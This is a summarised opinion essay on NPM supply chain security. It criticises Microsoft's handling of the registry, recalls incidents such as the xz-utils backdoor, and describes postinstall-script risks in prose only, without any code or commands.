Oh no, not again... a meditation on NPM supply chain attacks Published: Sep 9, 2025 ~ 1700 words | ~ 8 min read Tags: NodeJS, JavaScript, Exploits, Security, Enterprise --- Overview The author reflects on enduring security failures in the JavaScript and Node.js ecosystem, focusing on Microsoft’s stewardship of NPM and the continuing risks posed by supply chain attacks in 2025. Despite technological evolution, the ecosystem remains vulnerable, and Microsoft’s ownership has arguably created larger systemic threats. --- Key Points Microsoft as a "Bad Actor" The author bluntly states Microsoft in 2025 should be viewed as a "bad actor" threatening software companies due to poor security practices and negligence. Historical parallels to Microsoft’s mismanagement of Internet Explorer in early 2000s highlight a pattern of insecurity and abandonment. Historical Context: Past and Present Risks In the late 1990s and early 2000s, Microsoft’s Internet Explorer was deeply embedded but insecure, exposing users to security breaches. Legal action forced Microsoft to allow browser choice, but Microsoft never removed IE, leaving security risks intact for years. Similarly, Microsoft’s handling of NPM after acquiring GitHub in 2020 hasn’t effectively addressed security vulnerabilities in the package system. The NPM Supply Chain Problem NPM has become the largest and easiest way to distribute malware, evolving from targeting cryptocurrency wallets to critical infrastructure like tokens and access keys. Past incidents like the xz-utils backdoor and NX malicious package demonstrate the systemic threat from compromised dependencies. The ecosystem's architecture, particularly with features like postinstall scripts, allows arbitrary and potentially malicious code execution without user consent. Personal Experience and Early Warnings The author has a long history with Node.js and was concerned about NPM's security around 2015. Created proof-of-concept exploits to highlight risks, such as executing arbitrary scripts via npx with embedded postinstall commands. Developed a package.json linter to warn developers about dangerous scripts, but adoption was limited due to trust issues and opt-in constraints. These problems predated Microsoft’s ownership but have worsened under their management. The State of the Ecosystem Early NPM provided a solution to package management problems, enabling a flourishing but wild-west JavaScript ecosystem. Fragmentation arose as alternatives like Yarn and PNPM appeared due to dissatisfaction with NPM. Microsoft’s acquisition injected financial stability but not significant security improvements. Tools like GitHub’s Dependabot and Software Bill of Materials (SBOM) attestation are positive steps but insufficient. No strong package signing or protections exist to prevent repository squatting or AI-generated junk packages. Urgent Call for Action The current software ecosystem is fragile, insecure by default, and overly dependent on companies like Microsoft that are not adequately accountable. Security risks affect not just developers but customers, workers, and corporate profits. AI advancements will enable more sophisticated attacks, including social engineering enhanced by deepfakes. 2-Factor Authentication is insufficient to secure NPM ecosystems. Companies must urgently reevaluate their software tools and supply chain security to mitigate these growing threats. --- Conclusion The situation in 2025 echoes security failures of the past but with far greater implications due to modern software complexity and widespread dependency on NPM. Without industry-wide commitment to built-in supply chain security, risks will escalate. Microsoft's current handling leaves the community exposed, making it critical for organizations to scrutinize their software infrastructure and demand better protections. --- ##